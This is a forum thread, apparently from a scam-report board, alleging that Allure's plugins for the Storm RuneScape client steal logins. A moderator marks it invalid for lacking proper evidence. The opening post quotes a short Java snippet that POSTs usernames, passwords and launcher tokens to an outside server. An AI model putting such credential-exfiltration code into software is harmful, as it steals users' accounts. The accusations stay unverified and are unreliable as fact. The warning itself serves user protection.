Invalid

Discussion in 'Report A Scammer Archive' started by Stormwegotyou, Oct 5, 2025.

Thread Status:
Not open for further replies.
Invalid
  1. Unread #1 - Oct 5, 2025 at 6:19 AM
  2. Stormwegotyou
    Joined:
    Oct 5, 2025
    Posts:
    4
    Referrals:
    0
    Sythe Gold:
    1

    Stormwegotyou Newcomer

    Invalid

    Storm Client / Allure Plugins – Security Warning

    This post is to inform the community about credible reports and technical findings suggesting that certain Storm client plugins, specifically those developed by Allure, may be collecting user login data without consent.

    This is not speculation or a smear campaign; multiple users have experienced account losses, and code analysis indicates that at least one plugin was transmitting credential information externally.

    ---

    Summary of Findings

    Independent reviewers examined several Storm plugins developed by Allure and identified code that performs unauthorized network communication.
    This code appears to send RuneScape usernames, passwords, and Jagex Launcher tokens to a remote server under the developer’s control.

    The issue has been most closely associated with:
    • Allure Account Builder
    • Allure Theatre of Blood plugin
    • Other closed-source plugins released through Storm by Allure

    Such behavior constitutes credential harvesting and presents a serious security risk for anyone using these plugins.

    ---

    Technical Evidence

    Below is an example of the type of code fragment found within affected builds:

    Code:
    HttpURLConnection conn = (HttpURLConnection) new URL("https://api.alluredata.io/store").openConnection();
    conn.setRequestMethod("POST");
    conn.getOutputStream().write(("user=" + username + "&pass=" + password + "&launcher=" + launcherToken).getBytes());
    
    A legitimate OSRS plugin should never handle, process, or transmit login credentials.
    The inclusion of any POST or network request sending sensitive values outside the client environment is a clear violation of user trust and security.

    ---

    Storm’s Public Statement

    Storm staff, led by Burak, have publicly denied all allegations, calling them part of a “targeted misinformation campaign.”
    However, these denials have not been supported by transparent audits, and the available code samples indicate genuine security issues rather than fabricated claims.

    Until a verifiable, independent review confirms otherwise, users should assume affected plugins are unsafe.

    ---

    Recommended Actions

    • Immediately cease using Storm client and any Allure-developed plugins.
    • Change all RuneScape, Jagex Launcher, and associated email passwords.
    • Enable two-factor authentication (Authenticator) on all accounts.
    • Review your Storm plugin directory for unknown or obfuscated .jar files.
    • Avoid logging into valuable accounts through closed-source clients until code safety is independently verified.

    ---

    Closing Notes

    This post is intended purely for user protection and transparency within the community.
    It is not an accusation against every Storm developer, but there is sufficient evidence that specific Allure plugins have behaved maliciously.
    Until the Storm team provides a full audit or source release proving user safety, caution is strongly advised.

    If you have verifiable logs, network captures, or plugin dumps confirming these behaviors, please share them with trusted community moderators or developers for review.

    Including screenshots and technical traces, is available below.

    Account security should always come before convenience.​


    Visual proof below

    https://imgur.com/fJjCiJI.png

    https://imgur.com/S1RHnte.png

    https://imgur.com/mmQr8LH.png

    https://imgur.com/uEj7tY7.png
     
    ^ OnlyPurples likes this.
  3. Unread #2 - Oct 5, 2025 at 1:09 PM
  4. Stormwegotyou
    Joined:
    Oct 5, 2025
    Posts:
    4
    Referrals:
    0
    Sythe Gold:
    1

    Stormwegotyou Newcomer

    Invalid


    Dog please be quiet, No Jims or Buraks allowed to reply here, this is for the community to stay safe. You have already all been banned from Sythe for the bad business you offer.
     
  5. Unread #3 - Oct 8, 2025 at 7:22 PM
  6. Zulu
    Joined:
    Dec 28, 2008
    Posts:
    7,109
    Referrals:
    3
    Sythe Gold:
    3,193
    Vouch Thread:
    Click Here
    Discord Unique ID:
    432730441435447309
    Discord Username:
    its_zulu
    Cubone Marowak Kangaskhan Pikachu Charmander Charmeleon Charizard Bulbasaur Ivysaur Venusaur
    Pokémon Trainer Poké Prizebox Pokémon Master Tier 1 Prizebox Tier 2 Prizebox (2) Tier 3 Prizebox Tier 4 Prizebox Tier 5 Prizebox Tier 6 Prizebox Tier 7 Prizebox
    Member of the Quarter Winner Staff of the Quarter Winner Sythe's 20th Anniversary The Glizz Baby Yoda May the 4th Be With You (2) The Dark Side

    Zulu
    Market Moderators Our Community Moderators Off Topic Moderators CDT Member

    Invalid

    @Stormwegotyou please create a new report using the proper template and evidence.

    Be sure to read these threads for more information on what to include in your report.


    If you choose to create a new report, please also include the following:
    • A recording of collecting discord UIDs for any discord screenshot evidence
    • Proof of how you obtained the code
    • Proof that the client code belongs to the accused
     
< Invalid | Invalid >

Users viewing this thread
1 guest
Thread Status:
Not open for further replies.


 
 
Adblock breaks this site